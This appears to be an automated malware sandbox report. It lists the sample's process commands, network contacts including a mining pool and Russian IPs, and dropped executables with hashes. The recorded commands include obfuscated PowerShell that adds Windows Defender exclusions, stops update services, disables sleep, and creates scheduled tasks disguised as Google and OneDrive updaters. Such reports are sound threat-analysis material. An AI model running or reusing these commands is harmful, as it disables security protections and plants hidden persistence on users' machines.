"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=32378 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2016 --field-trial-handle=1452,i,12284341349177207831,9265141565800836784,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "Start-Process <#usqnxrsejgruozk#> powershell <#usqnxrsejgruozk#> -Verb <#usqnxrsejgruozk#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=32378 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2436 --field-trial-handle=1452,i,12284341349177207831,9265141565800836784,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=32378 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2420 --field-trial-handle=1452,i,12284341349177207831,9265141565800836784,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=32378 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3216 --field-trial-handle=1452,i,12284341349177207831,9265141565800836784,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=32378 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2552 --field-trial-handle=1452,i,12284341349177207831,9265141565800836784,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=32378 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3516 --field-trial-handle=1452,i,12284341349177207831,9265141565800836784,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 13:29 /f /tn OneDriveUpdateTask_MTA1 /tr "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle hidden Add-MpPreference -ExclusionPath "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe" -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 13:29 /f /tn "AppLaunch" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=37489 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataD2UCM" --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataD2UCM" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataD2UCM\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataD2UCM" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9c05f46f8,0x7ff9c05f4708,0x7ff9c05f4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1376,7588824095357734710,2530637292374620865,131072 --disable-features=PaintHolding --headless --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1508 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1376,7588824095357734710,2530637292374620865,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1868 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=37489 --allow-pre-commit-input --field-trial-handle=1376,7588824095357734710,2530637292374620865,131072 --disable-features=PaintHolding --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2000 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=37489 --allow-pre-commit-input --field-trial-handle=1376,7588824095357734710,2530637292374620865,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2268 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=37489 --allow-pre-commit-input --field-trial-handle=1376,7588824095357734710,2530637292374620865,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2460 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=37489 --allow-pre-commit-input --field-trial-handle=1376,7588824095357734710,2530637292374620865,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3052 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=37489 --allow-pre-commit-input --field-trial-handle=1376,7588824095357734710,2530637292374620865,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=37489 --allow-pre-commit-input --field-trial-handle=1376,7588824095357734710,2530637292374620865,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1376,7588824095357734710,2530637292374620865,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=audio --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=2424 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 126.134.241.8.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 226.98.244.136.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 163.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RU 185.159.129.168:80 tcp
US 8.8.8.8:53 86.8.109.52.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
RU 185.149.146.118:80 tcp
RU 77.91.77.144:80 tcp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:80 pastebin.com tcp
US 172.67.34.170:443 pastebin.com tcp
RU 46.29.235.84:80 46.29.235.84 tcp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
US 8.8.8.8:53 84.235.29.46.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.250.179.214:443 i.ytimg.com tcp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 214.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
NL 142.251.36.14:443 play.google.com udp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.194:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 194.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 194.23.217.172.in-addr.arpa udp
NL 142.250.179.194:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
US 8.8.8.8:53 217.192.94.141.in-addr.arpa udp
N/A 127.0.0.1:32378 tcp
N/A 127.0.0.1:32378 tcp
N/A 127.0.0.1:32378 tcp
N/A 127.0.0.1:32378 tcp
US 8.8.8.8:53 210.143.182.52.in-addr.arpa udp
NL 142.250.179.214:443 i.ytimg.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.251.36.34:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 34.36.251.142.in-addr.arpa udp
NL 142.251.36.34:443 googleads.g.doubleclick.net udp
N/A 127.0.0.1:37489 tcp
N/A 127.0.0.1:37489 tcp
N/A 127.0.0.1:37489 tcp
N/A 127.0.0.1:37489 tcp

Files

memory/4612-134-0x0000000074960000-0x0000000075110000-memory.dmp

memory/4612-133-0x00000000008C0000-0x00000000008F4000-memory.dmp

memory/4612-135-0x0000000005990000-0x0000000005FA8000-memory.dmp

memory/4612-136-0x0000000005480000-0x000000000558A000-memory.dmp

memory/4612-138-0x0000000005360000-0x0000000005370000-memory.dmp

memory/4612-137-0x0000000005390000-0x00000000053A2000-memory.dmp

memory/4612-139-0x00000000053F0000-0x000000000542C000-memory.dmp

memory/4612-140-0x0000000005700000-0x0000000005776000-memory.dmp

memory/4612-141-0x0000000005820000-0x00000000058B2000-memory.dmp

memory/4612-142-0x0000000006A50000-0x0000000006FF4000-memory.dmp

memory/4612-143-0x0000000074960000-0x0000000075110000-memory.dmp

memory/4612-144-0x00000000058C0000-0x0000000005926000-memory.dmp

memory/4612-145-0x0000000005360000-0x0000000005370000-memory.dmp

memory/4612-146-0x0000000006710000-0x0000000006760000-memory.dmp

memory/4612-147-0x00000000071D0000-0x0000000007392000-memory.dmp

memory/4612-148-0x0000000007C20000-0x000000000814C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/4700-169-0x00007FF72D1D0000-0x00007FF72E3F6000-memory.dmp

memory/4700-170-0x00007FF72D1D0000-0x00007FF72E3F6000-memory.dmp

memory/4700-171-0x00007FF9C7330000-0x00007FF9C7525000-memory.dmp

memory/4700-172-0x00007FF72D1D0000-0x00007FF72E3F6000-memory.dmp

memory/4700-173-0x00007FF72D1D0000-0x00007FF72E3F6000-memory.dmp

memory/4700-174-0x00007FF72D1D0000-0x00007FF72E3F6000-memory.dmp

memory/4700-175-0x00007FF72D1D0000-0x00007FF72E3F6000-memory.dmp

memory/4700-176-0x00007FF72D1D0000-0x00007FF72E3F6000-memory.dmp

memory/4700-177-0x00007FF72D1D0000-0x00007FF72E3F6000-memory.dmp

memory/4700-178-0x00007FF9C7330000-0x00007FF9C7525000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2888-187-0x0000000000CB0000-0x0000000000F3B000-memory.dmp

memory/2888-189-0x0000000000CB0000-0x0000000000F3B000-memory.dmp

memory/1408-188-0x0000000000800000-0x0000000000927000-memory.dmp

memory/1408-197-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-196-0x0000000000800000-0x0000000000927000-memory.dmp

memory/1408-199-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-198-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-200-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-201-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-202-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-203-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-205-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-204-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-206-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-207-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-208-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-209-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-211-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-210-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-212-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-213-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-214-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-215-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-216-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-217-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-218-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-219-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-220-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-221-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-222-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-223-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-224-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-225-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-226-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-228-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-227-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-229-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-231-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-232-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-230-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-233-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-234-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-235-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-236-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-237-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-238-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-239-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-240-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-241-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-242-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-243-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-244-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-245-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-264-0x0000000077472000-0x0000000077473000-memory.dmp

memory/2888-271-0x0000000000CB0000-0x0000000000F3B000-memory.dmp

memory/3808-307-0x00000199755A0000-0x00000199755C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q5rwxw3g.b3m.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3808-312-0x00007FF9A8590000-0x00007FF9A9051000-memory.dmp

memory/3808-313-0x00000199596A0000-0x00000199596B0000-memory.dmp

memory/3808-315-0x00000199596A0000-0x00000199596B0000-memory.dmp

memory/3808-314-0x00000199596A0000-0x00000199596B0000-memory.dmp

memory/3808-316-0x00000199596A0000-0x00000199596B0000-memory.dmp

memory/3808-319-0x00007FF9A8590000-0x00007FF9A9051000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/4936-323-0x00007FF9A8590000-0x00007FF9A9051000-memory.dmp

memory/4936-324-0x000001A3A59F0000-0x000001A3A5A00000-memory.dmp

memory/4936-325-0x000001A3A59F0000-0x000001A3A5A00000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

memory/4936-336-0x000001A3A59F0000-0x000001A3A5A00000-memory.dmp

memory/4936-337-0x000001A3A59F0000-0x000001A3A5A00000-memory.dmp

memory/4936-339-0x00007FF9A8590000-0x00007FF9A9051000-memory.dmp

memory/4700-342-0x00007FF9C7330000-0x00007FF9C7525000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/4700-344-0x00007FF72D1D0000-0x00007FF72E3F6000-memory.dmp

memory/2708-346-0x00007FF774440000-0x00007FF775666000-memory.dmp

memory/2708-347-0x00007FF9C7330000-0x00007FF9C7525000-memory.dmp

memory/2708-353-0x00007FF774440000-0x00007FF775666000-memory.dmp

memory/2708-355-0x00007FF9C7330000-0x00007FF9C7525000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
